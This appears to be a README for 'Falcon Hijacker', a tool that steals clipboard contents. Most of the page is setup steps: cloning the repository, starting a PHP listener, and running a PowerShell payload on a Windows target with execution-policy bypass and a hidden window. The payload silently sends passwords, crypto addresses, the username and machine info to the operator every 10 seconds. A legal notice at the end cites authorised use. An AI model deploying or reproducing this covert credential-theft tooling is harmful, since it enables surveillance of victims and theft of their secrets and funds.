FALCON-HIJACKER
Automated Clipboard Data Capture & Monitoring Tool
WHAT IS FALCON HIJACKER?
Falcon Hijacker is a professional clipboard monitoring tool designed for authorized security assessments. It captures real-time clipboard data from target systems through a streamlined Bash interface running on Linux, with a PowerShell payload deployed on Windows targets.
The tool sets up a local PHP web server and delivers a stealthy PowerShell payload that silently monitors and transmits clipboard content every 10 seconds — including text, passwords, crypto addresses, and more.
KEY FEATURES
- Live clipboard data streaming in real-time
- Timestamped structured logging with metadata
- PowerShell payload — no visible window, error suppression
- Checks clipboard every 10 seconds automatically
- Sends clipboard content + machine info + username
- Clean log export format for analysis
- Simple one-command setup on Linux
SUPPORTED PLATFORMS
TECH STACK
INSTALL DEPENDENCIES
apt-get -y install php wget
// Required: PHP for web server, wget for downloading dependencies
CLONE THE REPOSITORY
git clone https://github.com/rgsecteam/falcon-hijacker
NAVIGATE & RUN
cd falcon-hijacker bash falcon.sh
DEPLOY POWERSHELL PAYLOAD ON TARGET (WINDOWS)
powershell -NoP -NonI -W h -Exec Bypass .\clipboard_logger.ps1
// Runs the payload — checks clipboard every 10s, sends to your listener
HIDDEN EXECUTION (BACKGROUND)
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File .\clipboard_logger.ps1" -WindowStyle Hidden
// Runs completely hidden — no terminal window visible to the target
STOP THE BACKGROUND PROCESS
Stop-Process -Name powershell -Force
// Run on the Windows target to kill all powershell background processes
⚠ LEGAL & ETHICAL NOTICE
- Use this tool only for defensive, educational, or research purposes in controlled environments
- Always obtain explicit written permission before testing on any system you do not own
- Follow all applicable local, national, and international laws and organizational policies
- Unauthorized use of this tool to capture data is a criminal offense in most jurisdictions
- The RG Security Team bears no responsibility for any misuse, damage, or legal consequences
Licensed under MIT. By cloning or using this repository you accept full responsibility for your actions.